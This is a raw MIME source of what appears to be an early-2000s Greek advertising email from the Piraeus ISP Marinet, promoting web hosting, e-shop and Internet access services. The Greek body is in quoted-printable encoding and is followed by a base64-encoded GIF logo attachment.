=CF=EB=EF=EA=EB=E7=F1=F9=EC=DD=ED=E5=F2 =CB=FD=F3=E5=E9=F2 = =CC=E7=F7=E1=ED=EF=E3=F1=DC=F6=E7=F3=E7=F2=20 :
=D5=F0=E7=F1=E5=F3=DF=E5=F2 = Internet (=E9=F3=F4=EF=F3=E5=EB=DF=E4=E5=F2, e-shop,=20 webhosting) :
=C5=EC=F0=EF=F1=E9=EA=DD=F2 = =C5=F6=E1=F1=EC=EF=E3=DD=F2 : =20
=C1=EC=F6=DF=E4=F1=EF=EC=EF = =E4=EF=F1=F5=F6=EF=F1=E9=EA=FC Internet:
=C5=E3=EA=E1=F4=DC=F3=F4=E1=F3=E7 = & =F3=F5=ED=F4=DE=F1=E7=F3=E7 =F4=EF=F0=E9=EA=EF=FD = =E4=E9=EA=F4=FD=EF=F5=20 :
=CC=FC=ED=E9=EC=E5=F2=20 =EC=E9=F3=E8=F9=EC=DD=ED=E5=F2 = =E3=F1=E1=EC=EC=DD=F2 :
=CC=E5=DF=F9=F3=E7=20 = =F4=E7=EB=E5=F0=E9=EA=EF=E9=ED=F9=ED=E9=E1=EA=EF=FD = =EA=FC=F3=F4=EF=F5=F2 =F5=F0=E5=F1=E1=F3=F4=E9=EA=FE=ED = =EA=EB=DE=F3=E5=F9=ED :=20 =20 =
=CB=E5=F0=F4=EF=EC=DD=F1=E5=E9=E5=F2:
=20
 
=20 =20 =

=C1=ED =E4=E5=ED = =E5=F0=E9=E8=F5=EC=E5=DF=F4=E5 =ED=E1 =EB=DC=E2=E5=F4=E5 =EE=E1=ED=DC = =EA=DC=F0=EF=E9=E1=20 =F0=F1=EF=F3=F6=EF=F1=DC =EC=E5 e-mail =E1=F0=FC =F4=E7=ED = =E5=F4=E1=E9=F1=DF=E1 =EC=E1=F2
=F0=E1=F1=E1=EA=E1=EB=FE = =F0=E1=F4=DE=F3=F4=E5 =F4=EF=20 =F0=E1=F1=E1=EA=DC=F4=F9 = =EA=EF=F5=EC=F0=DF.

=20

=D5=F0=EF=F5=F1=E3=E5=DF=EF = =C1=ED=DC=F0=F4=F5=EE=E7=F2 - =D0=F1=FC=E3=F1=E1=EC=EC=E1=20 =C4=E9=EA=F4=F5=F9=E8=E5=DF=F4=E5
10.000 = =E5=F0=E9=F7=E5=E9=F1=DE=F3=E5=E9=F2 =E1=EE=E9=EF=F0=EF=DF=E7=F3=E1=ED = =DE=E4=E7 =F4=EF=20 =F0=F1=FC=E3=F1=E1=EC=EC=E1
=E3=E9=E1 =F4=E7=ED = =F0=F1=EF=EC=DE=E8=E5=E9=E1 =E7=EB=E5=F4=F1=EF=ED=E9=EA=EF=FD = =E5=EE=EF=F0=EB=E9=F3=EC=EF=FD =EA=E1=E9=20 =F5=F0=E7=F1=E5=F3=E9=FE=ED.


OTE : =CC=E5=DF=F9=F3=E7 = =F4=EF=F5 =F0=DC=E3=E9=EF=F5 =F4=DD=EB=EF=F5=F2 ISDN =E1=F0=FC=20 6.000 =E4=F1=F7/=EC=DE=ED=E1 =F3=E5 4.500 = =E4=F1=F7/=EC=DE=ED=E1


Marinet
=C1=EB=E9=F0=DD=E4=EF=F5 18,=20 18531 =D0=E5=E9=F1=E1=E9=DC=F2
=D4=E7=EB 01 = 4101130,1
Fax=20 014101132
sales@marinet.gr=20 =

=
------=_NextPart_001_000B_01C15CD4.D549F2E0-- ------=_NextPart_000_000A_01C15CD4.D549F2E0 Content-Type: image/gif; name="formlogo.gif" Content-Transfer-Encoding: base64 Content-Location: http://www.marinet.gr/sales/images/formlogo.gif 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 